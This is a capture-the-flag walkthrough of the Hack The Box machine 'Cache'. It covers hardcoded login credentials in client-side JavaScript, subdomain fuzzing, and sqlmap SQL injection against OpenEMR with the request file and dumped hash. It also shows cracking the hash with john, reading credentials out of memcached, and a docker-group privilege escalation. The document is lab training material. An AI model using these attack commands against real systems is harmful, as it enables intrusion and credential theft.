Basic information

Port scan

The usual 22 and 80.

80

Visiting the site directly gives little information:

The login page loads functionality.js, which has the username and password hardcoded in it:

ash:H@v3_fun

Nothing of interest after logging in either:

functionality.js

$(function(){

    var error_correctPassword = false;
    var error_username = false;

    // Client-side check: the expected password is hardcoded in the script.
    function checkCorrectPassword(){
        var Password = $("#password").val();
        if(Password != 'H@v3_fun'){
            alert("Password didn't Match");
            error_correctPassword = true;
        }
    }
    // Same for the username.
    function checkCorrectUsername(){
        var Username = $("#username").val();
        if(Username != "ash"){
            alert("Username didn't Match");
            error_username = true;
        }
    }
    $("#loginform").submit(function(event) {
        /* Act on the event */
        error_correctPassword = false;
        checkCorrectPassword();
        error_username = false;
        checkCorrectUsername();

        if(error_correctPassword == false && error_username == false){
            return true;
        }
        else{
            return false;
        }
    });

});
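As an added example (not part of the writeup), a small Python check that does what a code reviewer would do with a file like functionality.js: flag every credential-looking variable that is compared against a string literal, since any such comparison ships the secret to the browser. The input is a constructed excerpt of the script above; the name patterns are assumptions.

```python
import re

# Constructed sample: the client-side login check from the writeup,
# trimmed to the lines a reviewer would care about.
SAMPLE_JS = """
function checkCorrectPassword(){
var Password = $("#password").val();
if(Password != 'H@v3_fun'){
alert("Password didn't Match");
}
}
function checkCorrectUsername(){
var Username = $("#username").val();
if(Username != "ash"){
alert("Username didn't Match");
}
}
$("#loginform").submit(function(event) { return true; });
"""

# Identifier fragments that suggest a credential (assumed list, case-insensitive).
CREDENTIAL_NAMES = re.compile(r"(pass|pwd|user|login|token|secret)", re.I)

# An identifier compared (==, ===, !=, !==) against a quoted string literal.
LITERAL_COMPARE = re.compile(r"""(\w+)\s*(?:!==?|===?)\s*(['"])(.*?)\2""")


def find_hardcoded_credentials(js_source):
    """Return (line_no, variable, literal) for each credential-looking
    identifier that is compared against a string literal in JS source."""
    findings = []
    for line_no, line in enumerate(js_source.splitlines(), 1):
        for var, _quote, literal in LITERAL_COMPARE.findall(line):
            if CREDENTIAL_NAMES.search(var):
                findings.append((line_no, var, literal))
    return findings


if __name__ == "__main__":
    for line_no, var, literal in find_hardcoded_credentials(SAMPLE_JS):
        # Report the location only; the literal itself is the secret being leaked.
        print(f"line {line_no}: '{var}' compared against a hardcoded literal")
```

The fix for a finding is to move the comparison server-side and have the client only submit the form; a client-side script can never hold a secret.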

Subdomain scan

The author page hints at an "other project", so we consider subdomains. First generate a wordlist from the page content:

cewl -w wordlist.txt -d 10 -m 1 http://10.10.10.188/author.html
wfuzz -w wordlist.txt -H "HOST: FUZZ.htb" -u http://10.10.10.188/ --hc 400 --hh 8193

Target: http://10.10.10.188/
Total requests: 42

===================================================================
ID Response Lines Word Chars Payload
===================================================================

000000037: 302 0 L 0 W 0 Ch "HMS"

Add HMS.htb to the hosts file:

10.10.10.188 cache.htb hms.htb

hms.htb

Visiting it directly shows OpenEMR:

A search turns up an RCE that requires authentication:

A Google search turns up a SQL injection:

SQL injection

This requires access to the portal; sometimes people who finished the box before you have turned the portal off, in which case just reset the machine.

After that it's just sqlmap all the way:

sqlmap -r sql.txt
[14:33:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0

sqlmap -r sql.txt --dbs
available databases [2]:
[*] information_schema
[*] openemr

sqlmap -r sql.txt -D openemr --tables
sqlmap -r sql.txt -D openemr -T users_secure --dump
openemr_admin : $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.

john cracks it; the password is xxxxxx (gotcha):

sudo john -w=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 32 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxx (?)
1g 0:00:00:00 DONE (2020-05-24 05:13) 3.333g/s 2820p/s 2820c/s 2820C/s tristan..princesita
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Now we can log in to OpenEMR and use the RCE found earlier.

sql.txt

GET /portal/find_appt_popup_user.php?catid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OpenEMR=4ebpe344qk9vhcjgk2nesv54gv; PHPSESSID=qeiik41c06okaktjdpebot7n05
Upgrade-Insecure-Requests: 1
DNT: 1
Cache-Control: max-age=0

openEMR RCE

Just run the exploit and we get a shell as www-data:

user flag

Looking at the home directories reveals two users, one of them ash. Switch to ash with the password obtained earlier and get user.txt from the home directory:

Enumeration

Checking the locally open ports reveals 11211, which is clearly memcached:

ash@cache:~$ netstat -tulpn
netstat -tulpn
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:11211 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:*

memcached exploit

References:

telnet 127.0.0.1 11211
stats slabs
stats items
stats cachedump 1 0

get user
get user
VALUE user 0 5
luffy
END
get passwd
get passwd
VALUE passwd 0 9
0n3_p1ec3
END

We get luffy's password and switch to that user (this user can also log in directly over SSH). This user belongs to the docker group:

luffy@cache:~$ id
id
uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)

docker privilege escalation

Simply use docker to mount the host's root directory and read root.txt:

References